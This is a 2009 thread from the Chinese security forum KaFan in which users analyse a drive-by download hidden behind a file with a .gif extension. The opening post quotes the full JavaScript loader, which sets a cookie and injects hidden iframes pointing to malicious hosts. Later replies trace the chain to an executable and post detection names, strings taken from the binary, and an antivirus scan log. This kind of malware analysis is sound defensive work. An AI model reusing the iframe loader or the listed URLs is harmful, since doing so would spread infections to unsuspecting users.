收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 台湾GIF后缀的挂马
12下一页
返回列表 发新帖
查看: 3470|回复: 18
收起左侧

[病毒样本] 台湾GIF后缀的挂马

[复制链接]
dayang1717
发表于 2009-3-24 16:20:14 | 显示全部楼层 |阅读模式
http://tw.lovechina.tw.cn/count/js/gif.gif
内容
function Get(){var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000)var cookieString = new String(document.cookie)var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader)if (beginPosition != -1){ } else { document.cookie = "Cookie1=nishisb;expires="+ Then.toGMTString()document.writeln("<iframe style=display:none src=http:\/\/cqfywg.cn\/count\/js\/swf2.htm><\/iframe>");document.writeln("<iframe style=display:none src=http:\/\/cqfywg.cn\/count\/js\/old.htm><\/iframe>");document.writeln("<iframe style=display:none src=http:\/\/cqfywg.cn\/count\/js\/92.htm><\/iframe>");document.writeln("<iframe style=display:none src=http:\/\/cqfywg.cn\/count\/js\/tj.htm><\/iframe>");}}Get();exe地址,我就不找了,没时间了,呵呵
回复

举报

Sebastian
发表于 2009-3-24 16:24:46 | 显示全部楼层
JS/Dldr.Agent.lyf
回复

举报

幸福的猪猪
发表于 2009-3-24 16:43:08 | 显示全部楼层

回复 1楼 dayang1717 的帖子

kaba miss ,to kill !
回复

举报

tanlimo
发表于 2009-3-24 17:15:27 | 显示全部楼层
cqfywg.cn/count/js/old.htm
->http://count.xj.cn/count/js/css.css

cqfywg.cn/count/js/92.htm这个页我的电脑根本没法跑,就不解了
回复

举报

雨宫优子
发表于 2009-3-24 17:20:18 | 显示全部楼层
cqfywg.cn/count/js/92.htm
->http://count.xj.cn/count/js/67.exe
回复

举报

328397663
发表于 2009-3-24 17:22:05 | 显示全部楼层
放上来~`

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Sebastian
发表于 2009-3-24 17:22:21 | 显示全部楼层
css.css
TR/Crypt.NSPM.Gen
67.exe
TR/Crypt.NSPM.Gen
回复

举报

ledled
发表于 2009-3-24 17:22:34 | 显示全部楼层

回复 5楼 aarwwefdds 的帖子

Name: Packed/Packman
Type: Packer

Description:


Files:
c:\users\administrator\desktop\67.exe
回复

举报

The EQs
发表于 2009-3-24 17:24:51 | 显示全部楼层
Ultra String Reference
Address    Disassembly                               Text String
0040105B   push    00403006                          shelluser32.dllloadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
004011A0   push    00403004                          .shelluser32.dllloadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
004011F3   push    ebp                               (initial cpu selection)
004011FC   push    0040300C                          user32.dllloadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
0040120A   push    00403017                          loadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
00401226   push    00403027                          software\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
00401260   push    00403006                          shelluser32.dllloadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
004012AC   push    00403004                          .shelluser32.dllloadremotefontssoftware\microsoft\windows nt\currentversion\winlogonhttp://count.xj.cn/count/js/1.txt
004012CC   push    0040305D                          http://count.xj.cn/count/js/1.txt
回复

举报

Sebastian
发表于 2009-3-24 17:30:39 | 显示全部楼层
原帖由 EQ2 于 2009-3-24 17:24 发表
Ultra String Reference
Address    Disassembly                               Text String
0040105B   push    00403006                          shelluser32.dllloadremotefontssoftware\microsoft\windows  ...



Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'D:\new\hosts.exe'
D:\new\hosts.exe
    [FUND]      Ist das Trojanische Pferd TR/Crypt.NSPM.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4a3ba8bb.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
Beginne mit der Suche in 'D:\new\cq.exe'
D:\new\cq.exe
    [FUND]      Enthält Erkennungsmuster des Droppers DR/Dldr.Agent.AO
    --> csrss.exe
      [FUND]      Enthält Erkennungsmuster des SPR/QuickBatch.Gen-Programmes
    --> smss.exe
      [FUND]      Ist das Trojanische Pferd TR/Expl.IMG-WMF.FK.4
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f6a8bd.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
Beginne mit der Suche in 'D:\new\se.exe'
D:\new\se.exe
    [FUND]      Ist das Trojanische Pferd TR/Crypt.NSPM.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 49f6a8b1.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.
Beginne mit der Suche in 'D:\new\wow.exe'
D:\new\wow.exe
    [FUND]      Ist das Trojanische Pferd TR/Dldr.Delphi.Gen
    [HINWEIS]   Eine Sicherungskopie wurde unter dem Namen 4a3fa8bb.qua erstellt ( QUARANTÄNE )
    [HINWEIS]   Die Datei wurde gelöscht.


Ende des Suchlaufs: 2009年3月24日  17:30
Benötigte Zeit: 00:00 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

      0 Verzeichnisse wurden überprüft
      8 Dateien wurden geprüft
      6 Viren bzw. unerwünschte Programme wurden gefunden
      0 Dateien wurden als verdächtig eingestuft
      4 Dateien wurden gelöscht
      0 Viren bzw. unerwünschte Programme wurden repariert
      4 Dateien wurden in die Quarantäne verschoben
      0 Dateien wurden umbenannt
      0 Dateien konnten nicht durchsucht werden
      2 Dateien ohne Befall
      1 Archive wurden durchsucht
      0 Warnungen
      4 Hinweise

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-7 02:33 , Processed in 0.129289 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表